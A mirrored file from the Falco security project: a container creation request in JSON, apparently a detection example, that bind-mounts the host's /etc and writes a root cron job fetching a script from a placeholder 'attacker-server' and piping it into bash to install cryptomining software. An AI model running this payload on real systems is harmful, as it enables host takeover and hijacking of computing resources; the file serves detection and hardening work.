mirror of
https://github.com/falcosecurity/falco.git
synced 2025-10-21 19:44:57 +00:00
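An example showing how an overly permissive container environment can be exploited to install and run cryptomining software on a host system: the container bind-mounts the host's /etc (writable by default), so the command it runs can append a job to the host's root crontab. Not mounting host configuration directories into containers, or mounting them read-only, closes that write path.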
8 lines
272 B
JSON
{
"Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"],
"Image": "alpine:latest",
"HostConfig": {
"Binds": ["/etc:/mnt/etc"]
}
}